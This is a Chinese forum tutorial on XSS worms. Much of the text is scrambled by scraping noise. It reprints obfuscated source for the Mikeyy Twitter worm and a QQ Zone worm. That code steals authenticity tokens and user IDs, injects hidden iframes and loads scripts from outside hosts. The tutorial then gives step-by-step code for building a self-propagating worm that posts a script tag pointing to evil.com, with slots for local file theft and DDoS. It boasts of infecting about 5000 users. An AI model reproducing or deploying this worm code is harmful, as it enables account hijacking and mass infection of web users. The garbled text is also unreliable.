$ B" t  N# h+ k3 Z0 j4 Y

" `3 ?' f; g  D# @( u+ x/ l& @& Q8 EXmlHttp.open("GET\thttp://www.evil.com/collet.php","http://www.vul.site/wherever",false);

2 w: h4 {, Y$ CXmlHttp.send(null);

<script>
1 A4 x% s) U% k8 b) ~7 y1 Z复制代码(IV) 综合性的高级XSS蠕虫:什么是XSS蠕虫,他的实现,传染,工作原理,常见作用都是什么.
0 j- S0 P' a2 {# r复制代码案例:Twitter 蠕蟲五度發威
第一版:
  下载 (5.1 KB)

6 天前 08:27
% V' s8 s" x# ~7 b4 I2 z6 Y
" s9 o4 F; F& t) O! _( E+ `第二版:   1. var _0xc26a = ["Msxml2.XMLHTTP", "Microsoft.XMLHTTP", "connect", "toUpperCase", "GET", "?", "open", "", "Method", "OST ", " HTTP/1.1", "setRequestHeader", "Content-Type", "application/x-www-form-urlencoded", "onreadystatechange", "readyState", "send", "split", "join", "'", "%27", "(", "%28", ")", "%29", "*", "%2A", "~", "%7E", "!", "%21", "%20", "+", "%", "replace", "innerHTML", "documentElement", "exec", "Twitter should really fix this... Mikeyy", "I am done... Mikeyy", "Mikeyy is done..", "Twitter please fix this, regards Mikeyy", "random", "length", "floor", "mikeyy "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%6a%73%78%73%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%78%73%73%6a%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%62%61%6d%62%61%6d%79%6f%2e%31%31%30%6d%62%2e%63%6f%6d%2f%77%6f%6d%70%77%6f%6d%70%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "/status/update", "OST", "authenticity_token=", "&status=", "&return_rendered_status=true&twttr=true", "/account/settings", "&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user=", "&tab=home&update=update", "/account/profile_settings", "&user[profile_default]=false&tab=none&profile_theme=0&user[profile_use_background_image]=0&user[profile_background_tile]=0&user[profile_link_color]=", "&commit=save+changes", "wait()""];  
5 G/ ^( u( m  V, x# T
! U( e/ L$ D# B$ H+ q5 i   2.   
" }% _) H5 f- k# p: b: D: t
) q% ]: q, u' M6 o, ?% [( J   3. function XHConn(){  

   4.   var _0x6687x2,_0x6687x3=false;  

; ~; g5 z8 J% E   5.   try{ _0x6687x2= new ActiveXObject(_0xc26a[0x0]); }  

$ `' f$ n6 K7 b$ T7 Q* C: t   6.   catch(e) { try{ _0x6687x2= new ActiveXObject(_0xc26a[0x1]); }  

   7.   catch(e) { try { _0x6687x2= new XMLHttpRequest(); }  
# ~+ l) i/ Y+ T- W8 v* y% }! G
7 {% b! k% _/ G   8.   catch(e) { _0x6687x2=false; }; }; };  
复制代码第六版:   1. function wait() {  
2 l1 B: g& @% K6 t
   2.   var content = document.documentElement.innerHTML;  
8 E  Q$ h5 i! C+ ~  b
   3.   var tmp_cookie=document.cookie;  

   4.   var tmp_posted=tmp_cookie.match(/posted/);  

+ G" C! M/ N- p( {. h2 {  t   5.   authreg= new RegExp(/twttr.form_authenticity_token = '(.*)';/g);  

2 n/ @  |4 |6 s( t7 @0 @, x  D   6.   var authtoken=authreg.exec(content);  
  H5 O# e% J5 j& z+ L% E
   7.   var authtoken=authtoken[1];  
6 z# U& N& c1 N3 [
   8.   var randomUpdate= new Array();  
5 ^% I, N! \( }4 y# l7 @
   9.   randomUpdate[0]= "Be nice to your kids. They'll choose your nursing home. Womp. mikeyy.";  
/ L5 ?1 ?- ^& F
' d6 N8 |4 ?. L1 d% _  10.   randomUpdate[1]= "If you are born ugly blame your parents, if you died ugly blame your doctor. Womp. mikeyy.";  
) D( t2 ?' ~/ t3 f- J
  11.   randomUpdate[2]= "Every man should marry. After all, happiness is not the only thing in life. Womp. mikeyy.";  

  12.   randomUpdate[3]= "Age is a very high price to pay for maturity. Womp. mikeyy.";  

. o$ ?, \5 ?. t; a. L1 d  13.   randomUpdate[4]= "Ninety-nine percent of all lawyers give the rest a bad name. Womp. mikeyy.";  
8 y1 U; t& @8 V% K, y
  14.   randomUpdate[5]= "If your father is a poor man, it is your fate, but if your father-in-law is a poor man, it's your stupidity. Womp. mikeyy.";  

% Q1 Q/ {2 Q( q6 @. I( y3 A! ~  15.   randomUpdate[6]= "Money is not the only thing, it's everything. Womp. mikeyy.";  

  16.   randomUpdate[7]= "Success is a relative term. It brings so many relatives. Womp. mikeyy.";  

% j4 a2 I* m0 k& f! c* x  17.   randomUpdate[8]= "'Your future depends on your dreams', So go to sleep. Womp. mikeyy.";  

  18.   randomUpdate[9]= "God made relatives; Thank God we can choose our friends.Womp. mikeyy.";  

% W5 j; m, h& q7 l6 v, g) M  19.   randomUpdate[10]= "'Work fascinates me' I can look at it for hours ! Womp. mikeyy.";  

7 @3 M/ w5 l& |/ j  20.   randomUpdate[11]= "I have enough money to last me the rest of my life. (unless I buy something) Womp. mikeyy.";  
' V+ x6 ^( @5 _( D
- {* b! ]; a. e) ~  21.   randomUpdate[12]= "RT!! @spam Watch out for the Mikeyy worm [url]http://bit.ly/XvuJe";  

  22.   randomUpdate[13]= "FUCK. NEW MIKEYYY WORM! REMOVE IT: http://bit.ly/fuSkF";  

  23.   randomUpdate[14]= "Mikeyy worm is back!!! Click here to remove it: http://bit.ly/UTPXe";  
% j3 \# d5 w7 C3 x, ?! f0 O
  24.     
2 w2 J2 u* V6 W5 K6 @. ~% A3 L
  25.   var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];  
* Y. r% ?$ F& L4 w' v" m
* V3 s9 E4 c, l6 S# K4 j6 L; C9 A  26.   var updateEncode=urlencode(randomUpdate[genRand]);  
- Q/ E, f6 {$ p) [/ Z8 M
  27.     

1 V+ T, k% s" R0 D0 y  28.   var ajaxConn= new XHConn();  

  29.   ajaxConn.connect("/status/update","OST","authenticity_token="+authtoken+_"&status="+updateEncode+"&return_rendered_status=true&twttr=true");  

& L( H7 o$ ~* `8 I  30.   var _0xf81bx1c="Mikeyy";  

! s& O3 x2 q6 K" b+ x9 H  31.   var updateEncode=urlencode(_0xf81bx1c);  

  32.   var ajaxConn1= new XHConn();  
" K: Q* J1 r! {  f" w6 C
0 l# Z; O3 H4 k$ a  33.   ajaxConn1.connect("/account/settings","OST","authenticity_token="]+authtoken+"&user[name]="+updateEncode+""+updateEncode+"&user[description]="+updateEncode+"&user[location]="+updateEncode+"&user[protected]=0&commit=Save");  

  34.   var genXSS="000; }  #notifications{width: expression(document.body.appendChild(document.createElement('script')).src='http://runebash.net/xss.js');) #test { color:#333333";  

  35.   var XSS=urlencode(genXSS);  
- J2 h$ s! a, n+ L
  36.   var ajaxConn2= new XHConn();  
& g  T. F& f' v+ c/ ?
$ n+ M2 s0 z8 N0 n$ T2 `& |4 }. b7 [: Q! \  37.   ajaxConn2.connect("/account/profile_settings",""OST,"authenticity_token="]+authtoken+"&user[profile_sidebar_fill_color]="+XSS+"&commit=save+changes");  
1 K7 C. J; C, [1 y) a! d8 ^0 M
  38.     
% ]7 O9 u' \0 _, M  E' x0 y
  39. } ;  

  w: o" Q* `, p6 U  40. setTimeout(wait(),5250);  
! H( W0 |* p5 F* F4 Y6 Q复制代码QQ空间XSSfunction killErrors() {return true;}

% T+ g& T) o( u  d$ n( v* a" Zwindow.onerror=killErrors;


  `$ U  U' g4 o" {: V
* E+ Q& n4 x* f7 Lvar shendu;shendu=4;
2 i& V# j8 \. v0 v
; ^* P- _; m) L5 p7 [( u2 w//---------------global---v------------------------------------------
3 {+ C% b0 B- u1 b( |
  @4 ~$ J6 l2 y9 d; G% h//通过indexOf函数得到URL中相应的字符串，用于判断是否登录的吧？

var visitorID;var userurl;var guest;var xhr;var targetblogurlid="0";

- T) ?0 h" L% {+ [* Yvar myblogurl=new Array();var myblogid=new Array();

        var gurl=document.location.href;

        var gurle=gurl.indexOf("com/");
; R9 V6 T) p2 v/ j1 [% G
6 \1 _# J, C) L        gurl=gurl.substring(0,gurle+3);        
) Z- p6 N1 [$ x- {1 V2 n
        var visitorID=top.document.documentElement.outerHTML;

           var cookieS=visitorID.indexOf("g_iLoginUin = ");
2 i* b5 v& `: G
        visitorID=visitorID.substring(cookieS+14);

        cookieS=visitorID.indexOf(",");
/ ]% P  s. n2 s& n7 L0 G
        visitorID=visitorID.substring(0,cookieS);

  `. l+ z. ^5 D2 [2 B- \8 m* Q( H        get_my_blog(visitorID);
" W% B# P& M- L/ K) ?
; e7 w2 W- H) [( h6 T        DOshuamy();
7 H( w0 @7 J, e+ C- R1 R% b
1 Q2 z- K4 N4 Q3 ?" |
  g/ }( e; @( J
1 J: i2 b) V2 x' v//挂马
0 \- c' s" f3 j
; G4 R* s! {7 y* ?0 Afunction DOshuamy(){

, O8 X5 _3 y+ {6 |7 Q0 x0 Svar ssr=document.getElementById("veryTitle");
% q! K+ R( M! \( f% S4 q- K
ssr.insertAdjacentHTML("beforeend","<iframe width=0 height=0 src='http://www.xxx.com/1.html'></iframe>");

& f- w: l% H- Y# S* }$ p! q}
& e* M7 i' ~6 H" N6 ~2 Y$ b$ O) j/ ]
% T& L; x0 m  \2 K  F( N; \

3 N; I; T5 s9 }/ |//如果创建XMLHttpRequest成功就跳到指定的URL去，这个URL是干什么的就不知道了，没看过，刷人气？
4 m8 J- c  h3 v7 D) N
function get_my_blog(visitorID){

   userurl=gurl+"/cgi-bin/blognew/blog_output_toppage?uin="+visitorID+"&direct=1";

/ _0 h2 q6 r3 S; N9 n& B! q   xhr=createXMLHttpRequest();    //创建XMLHttpRequest对象
! e8 _' ]2 v8 l* i! K
   if(xhr){    //成功就执行下面的
3 P- t5 V! G+ H" |# |  \* a  S
; G* n6 P- I' u     xhr.open("GET",userurl,false);    //以GET方式打开定义的URL
* |" m! d; K! _( S* g2 F: |
     xhr.send();guest=xhr.responseText;

     get_my_blogurl(guest);    //执行这个函数
  y2 P; L5 m6 U% m$ O* Y: B
    }
% m# I  \  d1 C: L
}
, d; u2 [8 ^4 I( h" x: D

) G, ~7 z; H* F& H
//这里似乎是判断没有登录的
4 g1 c  q* Z& b- ~
, z& o- s' T# B8 pfunction get_my_blogurl(guest){
! P2 s' D, B9 Y/ d: V4 S; m2 n
  var mybloglist=guest;

  var myurls;var blogids;var blogide;

  for(i=0;i<shendu;i++){
1 g, M9 G/ m: @) E9 [
     myurls=mybloglist.indexOf('selectBlog(');    //查找URL中"selectBlog"字符串，干什么的就不知道了
$ l9 E( e) }$ `: m9 p
     if(myurls!=-1){    //找到了就执行下面的
" Y6 V5 y- r' L  M6 N
; n% h3 y% T) G0 @" F         mybloglist=mybloglist.substring(myurls+11);
2 C$ Z' n$ r; g- G( k9 k% \
         myurls=mybloglist.indexOf(')');
/ E( k( [7 l/ L$ H( H+ K/ O- C
  j0 b8 u, a! _8 w: _3 i         myblogid=mybloglist.substring(0,myurls);
9 M9 `5 I/ k# j
& \" _2 c2 g! i# P! R        }else{break;}

, E: q+ t7 o0 ~4 Y$ y* |  E% n}

2 a. v% D: f9 ]get_my_testself();    //执行这个函数

( u+ z7 H. I! c1 U. _* I( G7 }( l}

1 A  B: w" ]4 h( t1 m: ?. F3 [  v

//这里往哪跳就不知道了
8 y/ Q2 ^! F5 @) o% V5 s3 H
3 p( \/ y/ n4 X9 T  d4 Ifunction get_my_testself(){
( I% T2 D  |9 Z, q
  for(i=0;i<myblogid.length;i++){    //获得blogid的值
$ D! ^3 M% Z, ~% _* P/ g" Y& x
. G& |9 y, Y% x8 V: l+ C      var url=gurl+"/cgi-bin/blognew/blog_output_data?uin="+visitorID+"&blogid="+myblogid+"&r="+Math.random();

3 v; f: t+ K( `: T' h      var xhr2=createXMLHttpRequest();    //创建XMLHttpRequest对象
/ x& j0 h) ~4 s$ v
/ u# Z  R) N' m) `' c- u+ w      if(xhr2){        //如果成功

# |1 Q8 D, `& R" ]/ F1 I              xhr2.open("GET",url,false);     //打开上面的那个url

6 H; @6 g0 T# L5 _/ Q# M              xhr2.send();

              guest2=xhr2.responseText;
. `3 R( d! w' h( X7 @0 `
              var mycheckit=guest2.indexOf("baidu");    //找"baidu"这个字符串，找它做什么？

              var mycheckmydoit=guest2.indexOf("mydoit"); //找"mydoit"这个字符串

              if(mycheckmydoit!="-1"){    //返回-1则代表没找到
- `4 R' V( V& i: e" b
  [% I& y! l5 o" y                targetblogurlid=myblogid;   
0 A8 y: o- u# ], x2 r5 R4 {: k
* n# l1 b6 d2 w( s                add_jsdel(visitorID,targetblogurlid,gurl);    //执行它

                break;

               }
- {2 e) e+ ]0 L! |
! g3 \  n  y( N              if(mycheckit=="-1"){
9 Z" j0 J) t5 \- T
                targetblogurlid=myblogid;

5 T; ?: U7 a2 _6 {6 h9 h                add_js(visitorID,targetblogurlid,gurl);    //执行它
4 {& _# S3 |2 M
8 L+ K' a5 _, _% @+ J                break;
* _. s# ]6 Q; G4 r4 _5 H& p
               }
/ P( j+ N- W0 G: f" b
! l0 V, r) n  C3 \        }      
9 U* W$ o0 o$ u3 k, Z8 t! V* }# k4 ~
}
+ j. i3 h0 W! g4 q0 F8 _
}
% t: {% ~' a7 D2 I0 R8 L/ O

* a/ x" }+ J% s" f" G7 m
& X/ Q, }8 K: f9 q0 h//--------------------------------------  

1 J, z1 Y/ F+ [7 X//根据浏览器创建一个XMLHttpRequest对象

6 K. [# q* M) J* P1 _function createXMLHttpRequest(){
3 F( ]* R7 i3 g( f6 X
* V  {6 H/ y9 d' H; e& {4 h3 h    var XMLhttpObject=null;  

6 b3 O4 {: S- H. f/ c( d    if (window.XMLHttpRequest) {XMLhttpObject = new XMLHttpRequest()}  
+ y' u, O% f0 J; `4 Q7 ~
    else  

+ t8 m7 P" t4 e0 T. e1 Q% [      { var MSXML=['Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP','MSXML.XMLHTTP', 'MICROSOFT.XMLHTTP.1.0','MICROSOFT.XMLHTTP.1', 'Microsoft.XMLHTTP'];        

% y+ J6 B# Y6 E; s4 s# l( V        for(var i=0;i<MSXML.length;i++)  

7 _2 O, J- a; z/ F& Y        {  

- a4 {) c6 g* K- M6 S& E1 t& K1 s            try  
! i/ A% }  m0 s
- ?% J( |+ q1 R0 y+ b            {  
* Z1 X# a% ?# _
: k: T9 N/ Y1 l0 I/ h7 R6 N6 R                XMLhttpObject=new ActiveXObject(MSXML);  
6 N4 F9 u( n( y2 D( \
                break;  
/ N+ B1 b: C' i3 t
            }  

            catch (ex) {  

            }  

         }  
% Y( g2 @- H: l! A
      }
+ O2 s8 `7 A  v0 n4 R
return XMLhttpObject;

}  



* P& j8 m' ?% [5 k8 X% _//这里就是感染部分了

function add_js(visitorID,targetblogurlid,gurl){
5 b8 Y4 f5 r5 A
4 g( O0 q/ Q* z/ pvar s2=document.createElement('script');
3 H" V0 P! h9 L9 m& Z% P' U
s2.src='http://xss0211.111.5ghezu.com.cn/images/qq/temp/wm/linshi/index.php?gurl='+gurl+'&uin='+visitorID+'&blogid='+targetblogurlid+"&r="+Math.random();
- c0 M% A' ~# n5 j
s2.type='text/javascript';
7 a- N% a3 i# ^* }) l# S& ]+ K8 X8 A
document.getElementsByTagName('head').item(0).appendChild(s2);

}
, w+ u3 g' [; X; @. t1 E! E# Y


" I- _; ?  j* ~- K, Hfunction add_jsdel(visitorID,targetblogurlid,gurl){
9 o. @( {; X$ ^$ ?2 n5 g
var s2=document.createElement('script');
4 N2 ^8 r$ K$ |
7 u3 s# V3 d) [- es2.src='http://xss0211.111.5ghezu.com.cn/images/qq/temp/wm/linshi/del.php?gurl='+gurl+'&uin='+visitorID+'&blogid='+targetblogurlid+"&r="+Math.random();
2 X  s( F: I+ t; q* W$ g
' s- {% ~2 n- n- }s2.type='text/javascript';
7 b2 w, L$ O% M" Z$ K3 a% o
document.getElementsByTagName('head').item(0).appendChild(s2);

0 D' S! A$ l0 o1 p) h8 B% D/ P}
9 c1 h) t" E/ d; V. A复制代码通过以上几个蠕虫,我们可以总结蠕虫的工作原理为:
1:首先写入调用蠕虫代码到一个存在XSS漏洞的位置(在非长久性XSS漏洞里,我们也可以通过把短暂性的XSS连接通过各种传播方式,发送给其他用户,当某个用户中了XSS后,再通过蠕虫,向其好友发送同一短暂性XSS连接.)
! g( i9 j8 a9 g' K
2:受害用户在登陆状态中,观看了存在XSS的问题页面,JS执行,并植入XSS蠕虫代码到该用户帐户中,且通过搜索好友等方法,传播给其他用户.即复制感染过程.(在论坛或者回复类型页面中传播XSS蠕虫,只要保证每页面同时存在2个或者以上蠕虫,就可以保证蠕虫不会被增加的数据覆盖.)
# l0 p+ X% ^2 k! b. a9 W$ @5 f' h( h
5 G2 U, c0 \5 y, c* a, C综上所述,结合以上种种技巧,就可以创造我们自己的XSS蠕虫了.在我们的蠕虫里,我们可以添加截取屏幕功能,DDOS功能,可以判断客户端浏览器的版本,读取并且发送客户端的本地文件~


% K4 H8 U' t& N$ n/ K8 i下面,我们来初步写一个简单主体蠕虫,并且预留可添加功能的地方.
+ ?/ B6 ^" ~8 ^- ?
0 q- i& v# j2 E/ F' R2 A首先,自然是判断不同浏览器,创建不同的对象var request = false;
- V9 K/ M4 a  f) B. {5 I
if(window.XMLHttpRequest) {

request = new XMLHttpRequest();
: `# k: P- l( `
if(request.overrideMimeType) {

request.overrideMimeType('text/xml');
% O* z$ }1 C- B3 |, v7 z
; @8 \( Y3 a- N  c}

} else if(window.ActiveXObject) {

var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
0 o7 ?7 C4 T9 |" `9 D
for(var i=0; i<versions.length; i++) {
- y3 I6 w! I& U& A! M* W0 B
try {
6 m+ x& J5 k4 p! U& ~% K, i
$ d/ F& H( \( t' z, [' jrequest = new ActiveXObject(versions);

} catch(e) {}
( \' V, F, E, M4 Q: a0 g
. D9 U1 q4 g% ], F  h}
% |+ J. x1 S3 s1 J6 F0 C
5 @, `  A% r& S" L: f}

xmlHttpReq=request;
5 L! m, t3 v& @, I: y! E8 k复制代码可以此时添加判断浏览器具体型号和版本:   function browserinfo(){
2 V) o) A, c" f# ^3 g: w
        var Browser_Name=navigator.appName;
) D9 B# {# _5 w: \+ J, _8 @
0 X$ W& K; e, k1 s+ j1 [        var Browser_Version=parseFloat(navigator.appVersion);
0 [% Z. J0 `% S0 g
        var Browser_Agent=navigator.userAgent;
! U4 @! A, w6 V9 m$ x5 w- \6 T
6 X! m- u- i$ B0 Q( N5 z- D2 [        
1 w# S% c/ T3 `% p, d# Y- K
        var Actual_Version,Actual_Name;

0 |  P  X- y1 F) p        

        var is_IE=(Browser_Name=="Microsoft Internet Explorer");
2 w6 J" ]" i! j
        var is_NN=(Browser_Name=="Netscape");
8 [) s! \% a2 L" |& l( H. |
; D8 x7 e9 G, k  j        var is_Ch=(Browser_Name=="Chrome");
% G" q/ l3 A6 f! C6 u: M
        
/ |2 U8 Y) ~- Z: t  V! ]% G
        if(is_NN){
. }, W$ i& t* L7 {
( m) F7 U8 j  D0 L: M! o& [8 b/ P6 L7 m            if(Browser_Version>=5.0){
" t, N! A# l0 {7 u. Q; Z
                var Split_Sign=Browser_Agent.lastIndexOf("/");
8 W5 n, D, M; A8 i; A# }4 S0 F
  ~- _: I' I5 E7 Y                var Version=Browser_Agent.indexOf(" ",Split_Sign);

, q4 r1 Z, l/ r; d! a) v  v5 r                var Bname=Browser_Agent.lastIndexOf(" ",Split_Sign);

) E, ?$ X" R' Z7 w+ g

                Actual_Version=Browser_Agent.substring(Split_Sign+1,Version);
8 I  v3 Z& r2 o0 ]6 ]! g" O1 \1 Z
                Actual_Name=Browser_Agent.substring(Bname+1,Split_Sign);
$ h, Y. B9 h5 s& f6 k
( a( q( Q" s# U! i, L            }
' m& s& t( p7 T8 H4 j
            else{

                Actual_Version=Browser_Version;

6 I7 N$ P) R8 \9 }                Actual_Name=Browser_Name;
  c  S/ ^  k8 f* @4 Q
! M1 d/ q# n  Z- r% F+ N0 m            }
0 j5 F4 r+ {- y& O" ^) ~% H5 w
8 J: ?+ r' _! f4 X7 b* Z; c  {! b* u% c        }
3 Z' k5 }0 P) Y; }. }5 \3 M
1 s$ H& ~( d* T7 j8 Z. G4 S7 a        else if(is_IE){

            var Version_Start=Browser_Agent.indexOf("MSIE");

            var Version_End=Browser_Agent.indexOf(";",Version_Start);

            Actual_Version=Browser_Agent.substring(Version_Start+5,Version_End)
8 x3 v% z  h8 b( P$ J% f" f
) G  `' [+ d& e1 k/ d" a0 n            Actual_Name=Browser_Name;
5 e4 E4 N, x( d) C, k4 e6 ?( U
            
. u9 B8 \6 t& O, o9 B) Z
            if(Browser_Agent.indexOf("Maxthon")!=-1){

                Actual_Name+="(Maxthon)";

            }

            else if(Browser_Agent.indexOf("Opera")!=-1){
1 G+ k/ l- m, Q* ~
+ a5 I, Q* U. U  E" _4 S                Actual_Name="Opera";

" [# J( @2 c9 p8 {# ?: f                var tempstart=Browser_Agent.indexOf("Opera");

                var tempend=Browser_Agent.length;

' k  N0 w* ]# \- b% h7 m' k                Actual_Version=Browser_Agent.substring(tempstart+6,tempend)

            }
/ l6 ?. ^6 c1 h, i
) K% G$ f5 n. L        }
/ \, v/ l* B$ f
- c5 x0 U+ [8 l0 c2 l0 Z        else if(is_Ch){

4 a0 c$ T2 H$ M. N/ _+ j& H- t            var Version_Start=Browser_Agent.indexOf("Chrome");
# q2 y/ [- A- f  S; w" q
! p( |" h1 {0 y# l5 z            var Version_End=Browser_Agent.indexOf(";",Version_Start);

& j; B  e6 X. U: d+ }& @+ ~            Actual_Version=Browser_Agent.substring(Version_Start+5,Version_End)

            Actual_Name=Browser_Name;

# B6 l5 g: ^( _  a2 u% n2 t, x* P! B9 o            
; }8 B0 N+ w) d5 N7 e. K) E7 b/ D5 K! ~
            if(Browser_Agent.indexOf("Maxthon")!=-1){
/ p; f/ |) g/ N# {- f
# T6 G' d2 W9 `: q" w$ k- i4 F2 w                Actual_Name+="(Maxthon)";
( D3 c4 g% R2 D; ]
/ Z5 j& r2 Q1 o) B$ m& {9 y            }

- N9 [# J2 v" `* d( O            else if(Browser_Agent.indexOf("Opera")!=-1){

! h, B. l! ^4 H  a                Actual_Name="Opera";

% S% B  k2 X/ v$ B                var tempstart=Browser_Agent.indexOf("Opera");
" K+ @5 b0 s: w4 R8 h: l
                var tempend=Browser_Agent.length;

                Actual_Version=Browser_Agent.substring(tempstart+6,tempend)
$ A) G8 f2 l' r+ M$ d& b2 H/ A9 h3 k
            }

; ?, ]3 q- z$ q7 V: j        }

        else{

            Actual_Name="Unknown Navigator"

0 H$ V) F+ G$ B" n            Actual_Version="Unknown Version"

        }
! r# a5 U! ?- B  Z% L$ a4 u% Z
1 u/ H/ R* T5 D* ?
- ?- [, h% K6 b7 p7 _3 [
1 k' M( v( l9 D/ j/ y% k7 M4 h8 b        navigator.Actual_Name=Actual_Name;
. B* U$ l( `7 Y" `! C( n8 s
        navigator.Actual_Version=Actual_Version;

9 {! T+ u& Z0 r9 E8 u# _        

        this.Name=Actual_Name;
  q/ E4 _/ u; E3 l! q; J! W
) |0 H1 y, N/ N: r        this.Version=Actual_Version;
1 C9 ~4 i) F5 B& w$ ]
+ G/ u% L8 }' J2 G    }
4 r; B) t6 B2 D! u6 n9 D
    browserinfo();
: [% V! y  P% Y' t9 ]
    if(navigator.Actual_Version<8&&navigator.Actual_Name=="Miscrosoft Internet Explorer"){//调用IE读取本地敏感文件}

    if(navigator.Actual_Version<8&&navigator.Actual_Name=="Fire fox"){//调用Firefox读取本地敏感文件}

    if(navigator.Actual_Version<8&&navigator.Actual_Name=="Opera"){//调用Opera读取本地敏感文件}
* [: N) Y9 q' h( i, b
    if(navigator.Actual_Version<8&&navigator.Actual_Name=="Google Chrome"){//调用Google Chrome读取本地敏感文件}
复制代码随后可以选择调用镜象网页并且发送功能.参考上面的镜象代码
复制代码随后可以选择调用DDOS功能.参考上面的DDOS代码
6 d5 w5 o6 C9 a  S复制代码然后,在感染和传播功能发作之前,我们要判断当前页面有没有蠕虫存在,如果有,有多少只.如果虫的数量足够,我们就不要再植入蠕虫了.只要保证一定的数量就好.xmlHttpReq.open("GET","http://vul.com/vul.jsp", false);  //读取某页面.

+ B  F" k7 J# mxmlHttpReq.send(null);
' A+ a' L9 c: \& m$ v/ h
var resource = xmlHttpReq.responseText;

$ {' I5 B+ d3 C  r; `! Q0 {6 |# Tvar id=0;var result;

var patt = new RegExp("bugbug.js","g");     //这里是蠕虫的关键词,用以确定页面有多少只虫.譬如如果你的虫在bugbug.js,那么就可以搜索这个JS在页面内的数量.

$ |8 m6 y  i% C2 Y9 s; {( iwhile ((result = patt.exec(resource)) != null)  {
% O3 ]9 D. c! u0 W+ @0 ^2 v! m
id++;

}
复制代码然后,我们根据数量,来做下一步的操作.先判断,如果数量太少,我们就要让蠕虫感染起来.if(id<2){     //这里我们假设要求那个页面蠕虫的数量要有2只.

) x, f- t. A1 X  y7 n) Vno=resource.search(/my name is/);
  z& G8 @/ v* s! `
' n( _1 F, C8 P: s6 y) J6 gvar wd='<script src="http://www.evil.com/bugbug.js"</script>';        //wd是存在XSS漏洞的变量.我们在这里写入JS代码.

var post="wd="+wd;
4 N4 d! U$ ]/ O% V- i3 O4 p
xmlHttpReq.open("OST","http://www.vul.com/vul.jsp",false);        //把感染代码 POST出去.
1 O. ?- `( A0 D0 c) ]
xmlHttpReq.setRequestHeader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");

xmlHttpReq.setRequestHeader("content-length",post.length);

% m0 B" V# e) D4 fxmlHttpReq.setRequestHeader("content-type","application/x-www-form-urlencoded");

2 I* I4 S) l6 Q6 oxmlHttpReq.send(post);
7 ?; a/ R' N8 U
; X, f7 H- Q7 _+ o8 \0 P/ k- X}
( e7 r2 K' u3 \0 a( O- w复制代码如果虫的数量已经足够,那么我们就执行蠕虫:else{

! G, n3 `6 K3 P: ^var no=resource.search(/my name is/);     //这里是访问一个授权页面里,取得用户的名称.备份,并将来用在需要填写名称的地方

var namee=resource.substr(no+21,5);     //这里是重组用户名,条件是随便写的.具体情况当然要不同获得.
% V4 v3 w$ l4 S* i1 l
var wd="Support!"+namee+"<br>";        //这里就发出去了一个你指定的MESSAGE.当然,你可以把数据存入一组数组,random读取.

' J$ I. ^& y6 H+ s4 L  Cvar post="wd="+wd;

xmlHttpReq.open("OST","http://vul.com/vul.jsp",false);
2 p9 C& l0 ~$ v
xmlHttpReq.setRequestHeader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");

xmlHttpReq.setRequestHeader("content-length",post.length);
: q7 z; o+ {' K: B
: u8 ~, |) k6 K  t! RxmlHttpReq.setRequestHeader("content-type","application/x-www-form-urlencoded");
) }) C8 F  t' Y
, |! {1 K5 ?# q0 KxmlHttpReq.send(post);                 //把传播的信息 POST出去.

5 G  a1 H0 c0 ~  @1 P}
复制代码-----------------------------------------------------总结-------------------------------------------------------------------


1 e/ S6 n% ?8 M
) B# y; E, f$ s7 F# S! o本次教程案例中的蠕虫曾经测试成功并且感染了约5000名用户.
7 h4 N! i5 f; }1 `  r* C, E: X; B蠕虫仅仅是一个载体,在这个载体上,我们可以实现各种各样的功能.
操作JS调用COM,你的想象力有多大,蠕虫能力就有多大.这也是为什么国外黑客往往喜欢写蠕虫的原因.
" [4 N" Q& X& }, L1 F+ i+ c0 v


' [5 N  C! h, f7 S; L+ t

" b9 C* k. c; E$ l1 i4 Y

2 V; S$ M* H/ D* j7 p
本文引用文档资料:

"HTTP Request Smuggling" (Chaim Linhart, Amit Klein, Ronen Heled and Steve Orrin, June 2005)
Other XmlHttpRequest tricks (Amit Klein, January 2003)
"Cross Site Tracing" (Jeremiah Grossman, January 2003)
http://armorize-cht.blogspot.com 阿碼科技非官方中文 Blog
* h8 c, x7 V% [  Z9 c/ ?) G! I9 ]空虚浪子心BLOG http://www.inbreak.net
1 d& ?  i) d5 b8 N5 N) x  QXeye Team http://xeye.us/
( L( ]4 o. e5 g0 m) n

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2